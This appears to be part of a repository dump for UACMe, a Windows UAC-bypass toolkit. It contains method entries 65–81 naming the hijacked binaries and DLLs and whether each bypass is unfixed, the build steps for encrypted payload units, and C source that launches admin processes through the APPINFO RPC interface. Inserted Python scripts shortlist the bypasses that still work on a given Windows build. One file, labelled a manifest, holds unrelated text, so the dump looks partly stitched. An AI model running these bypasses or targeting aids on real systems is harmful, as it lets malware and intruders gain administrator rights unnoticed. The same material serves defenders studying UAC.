  * Code status: added in v3.5.1

65. Author: Arush Agarampur
  * Type: Elevated COM interface
  * Method: IWscAdmin
  * Target(s): Shell Protocol Hijack
  * Component(s): Attacker defined
  * Implementation: ucmWscActionProtocolMethod
  * Works from: Windows 7 (7600)
  * Fixed in: Windows 11 24H2 (26100)
  * How: Side effect of Windows changes
  * Code status: added in v3.5.2

66. Author: Arush Agarampur
  * Type: Elevated COM interface
  * Method: IFwCplLua, Shell Protocol Hijack
  * Target(s): Shell protocol registry entry and environment variables
  * Component(s): Attacker defined
  * Implementation: ucmFwCplLuaMethod2
  * Works from: Windows 7 (7600)
  * Fixed in: Windows 11 24H2 (26100)
  * How: Side effect of Windows changes
  * Code status: added in v3.5.3

67. Author: Arush Agarampur
  * Type: Shell API
  * Method: Shell Protocol Hijack
  * Target(s): \system32\fodhelper.exe
  * Component(s): Attacker defined
  * Implementation: ucmMsSettingsProtocolMethod
  * Works from: Windows 10 TH1 (10240)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.4

68. Author: Arush Agarampur
  * Type: Shell API
  * Method: Shell Protocol Hijack
  * Target(s): \system32\wsreset.exe
  * Component(s): Attacker defined
  * Implementation: ucmMsStoreProtocolMethod
  * Works from: Windows 10 RS5 (17763)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.5

69. Author: Arush Agarampur
  * Type: Shell API
  * Method: Environment variables expansion, Dll Hijack
  * Target(s): \system32\taskhostw.exe
  * Component(s): pcadm.dll
  * Implementation: ucmPcaMethod
  * Works from: Windows 7 (7600)
  * AlwaysNotify compatible
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.6

70. Author: V3ded
  * Type: Shell API
  * Method: Registry key manipulation
  * Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
  * Component(s): Attacker defined
  * Implementation: ucmShellRegModMethod3
  * Works from: Windows 10 (10240)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.7

71. Author: Arush Agarampur
  * Type: Dll Hijack
  * Method: ISecurityEditor
  * Target(s): Native Image Cache elements
  * Component(s): Attacker defined
  * Implementation: ucmNICPoisonMethod2
  * Works from: Windows 7 RTM (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.8

72. Author: Emeric Nasi
  * Type: Dll Hijack
  * Method: Dll path search abuse
  * Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
  * Component(s): BluetoothDiagnosticUtil.dll
  * Implementation: ucmMsdtMethod
  * Works from: Windows 10 (10240)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.9

73. Author: orange_8361 and antonioCoco
  * Type: Shell API
  * Method: .NET deserialization
  * Target(s): \system32\mmc.exe EventVwr.msc
  * Component(s): Attacker defined
  * Implementation: ucmDotNetSerialMethod
  * Works from: Windows 7 RTM (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.0

74. Author: zcgonvh
  * Type: Elevated COM interface
  * Method: IElevatedFactoryServer
  * Target(s): Attacker defined
  * Component(s): Attacker defined
  * Implementation: ucmVFServerTaskSchedMethod
  * Works from: Windows 8.1 (9600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.1

75. Author: zcgonvh derivative by Wh04m1001
  * Type: Elevated COM interface
  * Method: IDiagnosticProfile
  * Target(s): Attacker defined
  * Component(s): Attacker defined
  * Implementation: ucmVFServerDiagProfileMethod
  * Works from: Windows 7 RTM (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.2

76. Author: HackerHouse
  * Type: Dll Hijack
  * Method: Dll path search abuse, Registry key manipulation
  * Target(s): \syswow64\iscsicpl.exe
  * Component(s): iscsiexe.dll
  * Implementation: ucmIscsiCplMethod
  * Works from: Windows 7 RTM (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.3

77. Author: Arush Agarampur
  * Type: Dll Hijack
  * Method: IFileOperation
  * Target(s): \system32\mmc.exe
  * Component(s): atl.dll
  * Implementation: ucmAtlHijackMethod
  * Works from: Windows 7 RTM (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.4

78. Author: antonioCoco
  * Type: Impersonation
  * Method: SSPI Datagram
  * Target(s): Attacker defined
  * Component(s): Attacker defined
  * Implementation: ucmSspiDatagramMethod
  * Works from: Windows 7 RTM (7600)
  * AlwaysNotify compatible
  * Fixed in: Windows 10 (19041), as part of a 2024(?) patch
  * How: Side effect of Windows changes
  * Code status: added in v3.6.5

79. Author: James Forshaw and Stefan Kanthak
  * Type: GUI Hack
  * Method: UIPI bypass with token modification
  * Target(s): \system32\osk.exe, \system32\mmc.exe
  * Component(s): Attacker defined
  * Implementation: ucmTokenModUIAccessMethod2
  * Works from: Windows 7 (7600)
  * Fixed in: Windows 10 RS5 (17763), as part of a 2024 patch
  * How: When the integrity level of a UIAccess token is lowered, the UIAccess property is removed
  * Code status: added in v3.6.6

80. Author: R41N3RZUF477
  * Type: Shell API
  * Method: Environment variables expansion, Dll Hijack
  * Target(s): \system32\taskhostw.exe
  * Component(s): PerformanceTraceHandler.dll
  * Implementation: ucmRequestTraceMethod
  * Works from: Windows 11 (26100)
  * AlwaysNotify compatible
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.7

81. Author: R41N3RZUF477
  * Type: Shell API
  * Method: Environment variables expansion, Dll Hijack, UIPI bypass
  * Target(s): \system32\QuickAssist.exe
  * Component(s): EmbeddedBrowserWebView.dll
  * Implementation: ucmQuickAssistMethod
  * Works from: Windows 10 (19041)
  * AlwaysNotify compatible
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.8
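The method list is maintained as prose, which gets awkward to query once it passes eighty entries. The Python below is an added example, not part of UACMe, that parses entries written in the list's own format and answers the two questions a tester asks before picking a method: which entries are expected to work on a given Windows build, and which of those survive the "Always notify" UAC level. The three sample entries are copied from the list above (constructed input, embedded so the script runs offline). Two assumptions are built in and marked in the code: a "Fixed in" build and anything newer is treated as patched, and an entry without the "AlwaysNotify compatible" bullet is treated as unusable at that UAC level.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: three entries copied from the README method list above,
# in the list's own "N. Author: ..." plus "* Field: value" format.
SAMPLE = """\
67. Author: Arush Agarampur
  * Type: Shell API
  * Method: Shell Protocol Hijack
  * Target(s): \\system32\\fodhelper.exe
  * Component(s): Attacker defined
  * Implementation: ucmMsSettingsProtocolMethod
  * Works from: Windows 10 TH1 (10240)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.5.4
78. Author: antonioCoco
  * Type: Impersonation
  * Method: SSPI Datagram
  * Target(s): Attacker defined
  * Component(s): Attacker defined
  * Implementation: ucmSspiDatagramMethod
  * Works from: Windows 7 RTM (7600)
  * AlwaysNotify compatible
  * Fixed in: Windows 10 (19041), as part of a 2024(?) patch
  * How: Side effect of Windows changes
  * Code status: added in v3.6.5
80. Author: R41N3RZUF477
  * Type: Shell API
  * Method: Environment variables expansion, Dll Hijack
  * Target(s): \\system32\\taskhostw.exe
  * Component(s): PerformanceTraceHandler.dll
  * Implementation: ucmRequestTraceMethod
  * Works from: Windows 11 (26100)
  * AlwaysNotify compatible
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.6.7
"""

ENTRY_RE = re.compile(r"^\s*(\d+)\.\s+Author:\s*(.+?)\s*$")
FIELD_RE = re.compile(r"^\s*\*\s*(.+?)\s*$")
BUILD_RE = re.compile(r"\((\d{4,5})\)")  # build number in parentheses, e.g. "(17134)"


@dataclass
class Method:
    number: int
    author: str
    fields: Dict[str, str] = field(default_factory=dict)
    always_notify: bool = False  # set by the bare "AlwaysNotify compatible" bullet

    @property
    def works_from(self) -> int:
        return int(BUILD_RE.search(self.fields["Works from"]).group(1))

    @property
    def fixed_in(self) -> Optional[int]:
        """Build that fixed the method, or None when the field says 'unfixed'."""
        m = BUILD_RE.search(self.fields.get("Fixed in", ""))
        return int(m.group(1)) if m else None

    def applies_to(self, build: int, always_notify: bool = False) -> bool:
        """Assumption: the 'Fixed in' build and anything newer is patched, and
        a method without the AlwaysNotify flag does not work at that UAC level."""
        if build < self.works_from:
            return False
        if self.fixed_in is not None and build >= self.fixed_in:
            return False
        return self.always_notify or not always_notify


def parse_methods(text: str) -> List[Method]:
    methods: List[Method] = []
    current: Optional[Method] = None
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            current = Method(int(m.group(1)), m.group(2))
            methods.append(current)
            continue
        f = FIELD_RE.match(line)
        if f is None or current is None:
            continue
        body = f.group(1)
        if body == "AlwaysNotify compatible":
            current.always_notify = True
        elif ":" in body:
            key, value = body.split(":", 1)
            current.fields[key.strip()] = value.strip()
    return methods


def usable_methods(text: str, build: int, always_notify: bool = False) -> List[int]:
    """Method numbers expected to work on the given Windows build."""
    return [m.number for m in parse_methods(text) if m.applies_to(build, always_notify)]


if __name__ == "__main__":
    for build, an in ((10240, False), (19041, True), (26100, True)):
        print(f"build {build} always_notify={an}: {usable_methods(SAMPLE, build, an)}")
```

Run against the full README the same parser gives a per-build shortlist; the build number is taken from the first parenthesised number in the field, so entries whose "Fixed in" text carries extra commentary (like method 78) still resolve.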
**Important Notes:**

* Methods 30, 63 and later are implemented only in the x64 version
* Method 30 requires x64 because it exploits a WOW64 subsystem feature
* Method 55 is included primarily for educational purposes and may not be reliable
* Method 78 requires that the current user account password is not blank

## Warning

⚠️ **Important Security and Usage Information**:

* This tool demonstrates **only publicly known UAC bypass methods** used by malware. It reimplements some techniques in different ways to improve upon the original concepts.
* **Not intended for antivirus testing** and not guaranteed to work in environments with aggressive security software. Use with active antivirus at your own risk.
* Many antivirus solutions may flag this tool as a "HackTool"; this is expected behavior given its capabilities.
* **Clean up after usage**: if running on a production system, ensure you remove all program artifacts afterward. See the source code for details about the files dropped to system folders.
* Most methods were developed primarily for x64 systems. While many can work on x86-32 with minor adjustments, 32-bit support is not a focus of this project.
* For an official Microsoft explanation of why UAC bypasses still exist, see: [Microsoft's stance on UAC](https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105)

# Windows 10 support and testing policy

* UACMe is tested only on LTSB/LTSC variants (1607/1809) and on the current release and the one before it (RTM-1)
* For example: if the current version is 2004, it will be tested on 2004 (19041) and the previous 1909 (18363)
* Insider builds are not supported, as methods may be fixed in preview releases

# Protection Measures

The most effective protection against UAC bypass techniques is using an account without administrative privileges. A UAC bypass takes a user who is already a member of the Administrators group from the filtered (medium integrity) token to the full one; a standard user has no such token to elevate. Microsoft does not treat UAC as a security boundary (see the link above), so bypasses are closed mostly as a side effect of unrelated Windows changes, which is what the "How" field of the fixed entries records. Setting UAC to "Always notify" disables auto-elevation and removes every method not marked "AlwaysNotify compatible".

# Build instructions

UACMe is written in C and requires Microsoft Visual Studio 2019 or later to build from source.

### Prerequisites

* **IDE**: Microsoft Visual Studio 2019 or 2022
* **SDK Requirements**:
  * Windows 8.1 or Windows 10 SDK (tested with the 19041 version)
  * .NET Framework SDK (tested with version 4.8)

### Build Steps

1. **Configure Platform ToolSet** (Project->Properties->General):
   * For Visual Studio 2019: select v142
   * For Visual Studio 2022: select v143
2. **Set Target Platform Version** (Project->Properties->General):
   * For v140: select 8.1 (the Windows 8.1 SDK must be installed)
   * For v141 and above: select 10
3. **Build Process**:
   * Compile the payload units
   * Compile the Naka module
   * Encrypt all payload units using the Naka module
   * Generate secret blobs for these units using the Naka module
   * Move the compiled units and secret blobs to the Akagi\Bin directory
   * Rebuild Akagi

> **Note**: Compiled binaries are not provided and will never be provided. This serves as a barrier against malicious usage and helps maintain the educational purpose of this project.

## Legal Disclaimer

* This tool is provided for **educational and research purposes only**
* We do not take any responsibility for this tool being used in malicious activities
* We have no affiliation with any "security company" using this code for commercial activities
* This GitHub repository (hfiref0x/UACME) is the only genuine source for UACMe code

# Support

If you find this project interesting, you can buy me a coffee

BTC (Bitcoin): bc1qzkvtpa0053cagf35dqmpvv9k8hyrwl7krwdz84q39mcpy68y6tmqsju0g4

# References

* Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
* Malicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
* Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/
* Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog
* KernelMode.Info UACMe thread, https://www.kernelmode.info/forum/viewtopicf985.html?f=11&t=3643
* Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
* "Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
* Using IARPUninstallStringLauncher COM interface to bypass UAC, http://www.freebuf.com/articles/system/116611.html
* Bypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
* "Fileless" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/
* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
* Reading Your Way Around UAC in 3 parts:
  1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
  2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
  3. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
* Research on CMSTP.exe, https://msitpros.com/?p=3960
* UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.html
* UAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
* Yet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
* UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/
* Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
* Fileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html
* Calling Local Windows RPC Servers from .NET, https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html
* Microsoft Windows 10 UAC bypass local privilege escalation exploit, https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html
* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944
* Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html
* Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html
* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html

# Authors

(c) 2014 - 2026 UACMe Project

================================================
FILE: Source/Akagi/aic.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2026
*
*  TITLE:       AIC.C
*
*  VERSION:     3.69
*
*  DATE:        12 Feb 2026
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

#ifdef _WIN64
#include "appinfo/x64/appinfo64.h"
#else
#include "appinfo/x86-32/appinfo32.h"
#endif

/*
* AicpAsyncInitializeHandle
*
* Purpose:
*
* Init RPC_ASYNC_STATE structure.
*
*/
RPC_STATUS AicpAsyncInitializeHandle(
    _Inout_ RPC_ASYNC_STATE* AsyncState)
{
    RPC_STATUS status;

    status = RpcAsyncInitializeHandle(AsyncState, sizeof(RPC_ASYNC_STATE));
    if (status == RPC_S_OK) {
        // Completion is signalled through an auto-reset event that the caller waits on.
        AsyncState->NotificationType = RpcNotificationTypeEvent;
        AsyncState->u.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
        if (AsyncState->u.hEvent == NULL)
            status = GetLastError();
    }

    return status;
}

/*
* AicpAsyncCloseHandle
*
* Purpose:
*
* Close RPC_ASYNC_STATE notification event.
*
*/
VOID AicpAsyncCloseHandle(
    _Inout_ RPC_ASYNC_STATE* AsyncState)
{
    if (AsyncState->u.hEvent) {
        CloseHandle(AsyncState->u.hEvent);
        AsyncState->u.hEvent = NULL;
    }
}

/*
* AicLaunchAdminProcess
*
* Purpose:
*
* Create process by talking to APPINFO via RPC.
*
*/
BOOLEAN AicLaunchAdminProcess(
    _In_opt_ LPWSTR ExecutablePath,
    _In_opt_ LPWSTR CommandLine,
    _In_ DWORD StartFlags,
    _In_ DWORD CreationFlags,
    _In_ LPWSTR CurrentDirectory,
    _In_ LPWSTR WindowStation,
    _In_opt_ HWND hWnd,
    _In_ DWORD Timeout,
    _In_ DWORD ShowFlags,
    _Out_ PROCESS_INFORMATION* ProcessInformation
)
{
    BOOLEAN bResult = FALSE;
    RPC_BINDING_HANDLE rpcHandle;
    RPC_ASYNC_STATE asyncState;
    APP_PROCESS_INFORMATION procInfo;
    APP_STARTUP_INFO appStartup;
    RPC_STATUS status;
    VOID* Reply = NULL;
    LONG elevationType = 0;

    if (ProcessInformation) {
        ProcessInformation->hProcess = NULL;
        ProcessInformation->hThread = NULL;
        ProcessInformation->dwProcessId = 0;
        ProcessInformation->dwThreadId = 0;
    }

    RtlSecureZeroMemory(&procInfo, sizeof(procInfo));
    RtlSecureZeroMemory(&appStartup, sizeof(appStartup));
    appStartup.dwFlags = STARTF_USESHOWWINDOW;
    appStartup.wShowWindow = (SHORT)ShowFlags;

    RtlSecureZeroMemory(&asyncState, sizeof(RPC_ASYNC_STATE));

    if ((supCreateBindingHandle(APPINFO_RPC, &rpcHandle) == RPC_S_OK) &&
        (AicpAsyncInitializeHandle(&asyncState) == RPC_S_OK))
    {
        __try {
            RAiLaunchAdminProcess(&asyncState,
                rpcHandle,
                ExecutablePath,
                CommandLine,
                StartFlags,
                CreationFlags,
                CurrentDirectory,
                WindowStation,
                &appStartup,
                (ULONG_PTR)hWnd,
                Timeout,
                &procInfo,
                &elevationType);

            if (WaitForSingleObject(asyncState.u.hEvent, INFINITE) == WAIT_FAILED) {
                RpcRaiseException(-1);
            }

            // RpcAsyncCompleteCall writes the remote procedure's return value
            // (a long) through Reply, so a still-NULL Reply means
            // RAiLaunchAdminProcess itself returned 0.
            status = RpcAsyncCompleteCall(&asyncState, &Reply);
            if (status == 0 && Reply == NULL) {
                if (ProcessInformation) {
                    ProcessInformation->hProcess = (HANDLE)procInfo.ProcessHandle;
                    ProcessInformation->hThread = (HANDLE)procInfo.ThreadHandle;
                    ProcessInformation->dwProcessId = (DWORD)procInfo.ProcessId;
                    ProcessInformation->dwThreadId = (DWORD)procInfo.ThreadId;
                }
                bResult = TRUE;
            }

            AicpAsyncCloseHandle(&asyncState);
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            AicpAsyncCloseHandle(&asyncState);
            RpcBindingFree(&rpcHandle);
            SetLastError(RpcExceptionCode());
            return FALSE;
        }

        RpcBindingFree(&rpcHandle);
    }

    return bResult;
}
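AicLaunchAdminProcess hands APP_STARTUP_INFO and APP_PROCESS_INFORMATION to the MIDL-generated client stub, and the repository keeps separate x64 and x86-32 stubs (appinfo64.c, appinfo32.c) because the `wchar_t*` and `unsigned __int3264` members of those structures, and the stub's own stack frame, change width with the pointer size. The Python below is an added example, not project code: it rebuilds both layouts with ctypes using fixed-width types, so it runs on any host, and checks them against the numbers the generated stubs encode in their format strings: a 56-byte APP_STARTUP_INFO (with the MonitorPoint member at offset 44, which is what the FC_STRUCTPAD2/FC_STRUCTPAD4 entries pad for), a 24-byte APP_PROCESS_INFORMATION and a 112-byte (0x70) stack frame on x64, versus a 16-byte APP_PROCESS_INFORMATION and a 56-byte (0x38) frame on x86. It assumes the /Zp8 natural alignment the stub headers state; the x86 APP_STARTUP_INFO size of 48 is derived the same way but is not cross-checked against a stub here.

```python
import ctypes
from ctypes import sizeof, c_int16, c_int32, c_uint32, c_uint64

# Parameter order of RAiLaunchAdminProcess as the MIDL client stub sees it:
# the async handle and the binding handle first, then the IDL parameters,
# then the return value. Every slot is one pointer wide in the Oi2 stack layout,
# so a `long` still occupies a full 8-byte slot on x64.
STUB_SLOTS = [
    "RAiLaunchAdminProcess_AsyncHandle", "hBinding",
    "ExecutablePath", "CommandLine", "StartFlags", "CreationFlags",
    "CurrentDirectory", "WindowStation", "StartupInfo", "hWnd", "Timeout",
    "ProcessInformation", "ElevationType", "ReturnValue",
]


def make_layout(ptr_size: int):
    """Build the appinfo.idl structures for a pointer width (8 = x64, 4 = x86-32).
    wchar_t* and unsigned __int3264 follow the pointer width; long stays 32-bit."""
    ptr_t = c_uint64 if ptr_size == 8 else c_uint32

    class MONITOR_POINT(ctypes.Structure):
        _fields_ = [("MonitorLeft", c_int32), ("MonitorRight", c_int32)]

    class APP_STARTUP_INFO(ctypes.Structure):
        _fields_ = (
            [("lpszTitle", ptr_t)]
            + [(name, c_int32) for name in (
                "dwX", "dwY", "dwXSize", "dwYSize", "dwXCountChars",
                "dwYCountChars", "dwFillAttribute", "dwFlags")]
            + [("wShowWindow", c_int16), ("MonitorPoint", MONITOR_POINT)]
        )

    class APP_PROCESS_INFORMATION(ctypes.Structure):
        _fields_ = [("ProcessHandle", ptr_t), ("ThreadHandle", ptr_t),
                    ("ProcessId", c_int32), ("ThreadId", c_int32)]

    return APP_STARTUP_INFO, APP_PROCESS_INFORMATION


def stub_numbers(ptr_size: int) -> dict:
    """Sizes and stack offsets that the generated stub's format strings encode
    for the given architecture."""
    startup, procinfo = make_layout(ptr_size)
    offsets = {name: i * ptr_size for i, name in enumerate(STUB_SLOTS)}
    return {
        "APP_STARTUP_INFO": sizeof(startup),
        "MonitorPoint_offset": startup.MonitorPoint.offset,
        "APP_PROCESS_INFORMATION": sizeof(procinfo),
        "stack_size": len(STUB_SLOTS) * ptr_size,
        "ExecutablePath_offset": offsets["ExecutablePath"],
        "ElevationType_offset": offsets["ElevationType"],
        "ReturnValue_offset": offsets["ReturnValue"],
        # hWnd is unsigned __int3264: FC_UINT3264 on x64, FC_LONG on x86.
        "hWnd_is_64bit": ptr_size == 8,
    }


if __name__ == "__main__":
    for arch, ptr in (("x64", 8), ("x86-32", 4)):
        print(arch, stub_numbers(ptr))
```

The practical consequence for anyone reusing this interface from another language is that a hand-written NDR encoder must pick the layout per architecture: the ElevationType slot sits at 96 on x64 and 48 on x86, and APP_PROCESS_INFORMATION's two handles shrink from 8 bytes to 4.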
================================================
FILE: Source/Akagi/aic.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2020
*
*  TITLE:       AIC.H
*
*  VERSION:     3.23
*
*  DATE:        17 Dec 2019
*
*  Common header file for the AppInfo routines.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

typedef ULONG ELEVATION_REASON;

BOOLEAN AicLaunchAdminProcess(
    _In_opt_ LPWSTR ExecutablePath,
    _In_opt_ LPWSTR CommandLine,
    _In_ DWORD StartFlags,
    _In_ DWORD CreationFlags,
    _In_ LPWSTR CurrentDirectory,
    _In_ LPWSTR WindowStation,
    _In_opt_ HWND hWnd,
    _In_ DWORD Timeout,
    _In_ DWORD ShowFlags,
    _Out_ PROCESS_INFORMATION* ProcessInformation);

================================================
FILE: Source/Akagi/akagi.manifest
================================================
Akagi was an aircraft carrier of the Imperial Japanese Navy (IJN), named after Mount Akagi in present-day Gunma Prefecture.

================================================
FILE: Source/Akagi/appinfo/appinfo.acf
================================================
interface LaunchAdminProcess
{
    [async] RAiLaunchAdminProcess();
}

================================================
FILE: Source/Akagi/appinfo/appinfo.idl
================================================
import "oaidl.idl";
import "ocidl.idl";

[
    uuid(201ef99a-7fa0-444c-9399-19ba84f12a1a),
    version(1.0),
]
interface LaunchAdminProcess
{
    typedef struct _MONITOR_POINT {
        long MonitorLeft;
        long MonitorRight;
    } MONITOR_POINT;

    typedef struct _APP_STARTUP_INFO {
        wchar_t* lpszTitle;
        long dwX;
        long dwY;
        long dwXSize;
        long dwYSize;
        long dwXCountChars;
        long dwYCountChars;
        long dwFillAttribute;
        long dwFlags;
        short wShowWindow;
        struct _MONITOR_POINT MonitorPoint;
    } APP_STARTUP_INFO;

    typedef struct _APP_PROCESS_INFORMATION {
        unsigned __int3264 ProcessHandle;
        unsigned __int3264 ThreadHandle;
        long ProcessId;
        long ThreadId;
    } APP_PROCESS_INFORMATION;

    long RAiLaunchAdminProcess(
        handle_t hBinding,
        [in][unique][string] wchar_t* ExecutablePath,
        [in][unique][string] wchar_t* CommandLine,
        [in] long StartFlags,
        [in] long CreationFlags,
        [in][string] wchar_t* CurrentDirectory,
        [in][string] wchar_t* WindowStation,
        [in] struct _APP_STARTUP_INFO* StartupInfo,
        [in] unsigned __int3264 hWnd,
        [in] long Timeout,
        [out] struct _APP_PROCESS_INFORMATION* ProcessInformation,
        [out] long* ElevationType);
}

================================================
FILE: Source/Akagi/appinfo/x64/appinfo64.c
================================================
/* this ALWAYS GENERATED file contains the RPC client stubs */

/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for appinfo.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany),
__declspec(novtable) DECLSPEC_UUID(), MIDL_INTERFACE() */ /* @@MIDL_FILE_HEADING( ) */ #if defined(_M_AMD64) #pragma warning( disable: 4049 ) /* more than 64k source lines */ #if _MSC_VER >= 1200 #pragma warning(push) #endif #pragma warning( disable: 4211 ) /* redefine extern to static */ #pragma warning( disable: 4232 ) /* dllimport identity*/ #pragma warning( disable: 4024 ) /* array to pointer mapping*/ #include "appinfo64.h" #define TYPE_FORMAT_STRING_SIZE 75 #define PROC_FORMAT_STRING_SIZE 103 #define EXPR_FORMAT_STRING_SIZE 1 #define TRANSMIT_AS_TABLE_SIZE 0 #define WIRE_MARSHAL_TABLE_SIZE 0 typedef struct _appinfo_MIDL_TYPE_FORMAT_STRING { short Pad; unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; } appinfo_MIDL_TYPE_FORMAT_STRING; typedef struct _appinfo_MIDL_PROC_FORMAT_STRING { short Pad; unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; } appinfo_MIDL_PROC_FORMAT_STRING; typedef struct _appinfo_MIDL_EXPR_FORMAT_STRING { long Pad; unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; } appinfo_MIDL_EXPR_FORMAT_STRING; static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; extern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString; extern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString; extern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString; #define GENERIC_BINDING_TABLE_SIZE 0 /* Standard interface: LaunchAdminProcess, ver. 
